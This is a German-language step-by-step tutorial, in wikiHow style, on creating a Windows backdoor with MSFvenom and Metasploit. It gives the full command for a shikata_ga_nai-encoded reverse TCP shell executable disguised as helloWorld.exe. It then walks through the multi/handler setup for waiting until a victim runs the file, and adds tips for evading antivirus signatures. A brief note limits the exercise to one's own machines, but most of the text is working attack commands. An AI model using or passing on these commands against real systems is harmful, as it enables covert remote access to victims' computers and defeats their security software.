Eine Hintertür wird verwendet, um Sicherheitsmechanismen zu umgehen, oft heimlich und meist unauffindbar. Mit MSFvenom, der Kombination aus msfpayload und msfencode, ist es möglich, eine Hintertür zu erstellen, die sich mithilfe von Reverse-Shell-TCP mit dem Angreifer verbindet. Um eine Hintertür zu entwickeln, müssen Sie die Signatur Ihrer Malware ändern, um jede Antivirensoftware zu umgehen. Schließen Sie dieses Projekt auf zwei Computern ab, auf die Sie Zugriff haben. Dabei erfahren Sie mehr über Computersicherheit und wie diese Art von Hintertür funktioniert.
Schritte
Schritt 1. Starten Sie Kali und starten Sie die Terminal-Konsole
Schritt 2. Geben Sie ifconfig ein, um die Schnittstelle anzuzeigen und Ihre IP-Adresse zu überprüfen
Schritt 3. Geben Sie msfvenom -l encoders ein, um die Liste der Encoder anzuzeigen
Als Encoder verwenden Sie x86/shikata_ga_nai
Schritt 4. Geben Sie "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe. ein
- -a x86 --platform windows bezeichnet die zu verwendende Architektur.
- -p windows/shell/reverse_tcp bezeichnet die einzubettenden Payloads.
- LHOST bezeichnet die Listener-IP-Adresse.
- LPORT bezeichnet den Listener-Port.
- -b "\x00" bezeichnet die Vermeidung von schlechten Zeichen (null Bytes).
- -e x86/shikata_ga_nai bezeichnet den Namen des Encoders.
- -f exe > helloWorld.exe bezeichnet die Formatausgabe.
Schritt 5. Geben Sie msfconsole ein, um Metasploit zu aktivieren
Jetzt haben Sie Ihre Hintertür generiert. Wenn das Opfer auf helloWorld.exe klickt, wird die eingebettete Shell-Nutzlast aktiviert und stellt eine Verbindung zurück zu Ihrem System her. Um die Verbindung zu erhalten, müssen Sie den Multihandler in Metasploit öffnen und die Payloads einstellen
Schritt 6. Geben Sie use Exploit/Multi/Handler ein
Schritt 7. Geben Sie set payload windows/shell/reverse_tcp ein
Schritt 8. Geben Sie show options ein, um das Modul zu überprüfen
Schritt 9. Geben Sie set LHOST 192.168.48.129 ein
"LHOST" bezeichnet die Listener-IP-Adresse
Schritt 10. Geben Sie set LPORT 4444 ein
"LPORT" bezeichnet den Listener-Port
Schritt 11. Geben Sie run ein und warten Sie auf die Verbindung vom Computer des Opfers
Schritt 12. Warten Sie, bis das Opfer auf helloWorld.exe klickt
Dann werden Sie erfolgreich mit dem Computer des Opfers verbunden.
Tipps
- Die Verwendung von -i in MSFvenom repräsentiert die Iterationen der Codierung. Manchmal können weitere Iterationen helfen, die AV-Software zu umgehen.
- Sie haben gelernt, wie man die Hintertür generiert und mit MSFvenom codiert, aber diese Methode funktioniert heutzutage nicht mehr perfekt gegen einige der heutigen AV-Software. Der Grund dafür liegt in den Ausführungsvorlagen in MSFvenom. Die AV-Anbieter haben die statische Signatur dieser Vorlagen hinzugefügt und suchen einfach danach. Die Lösung für dieses Problem besteht darin, eine andere Ausführungsvorlage oder andere Tools zu verwenden.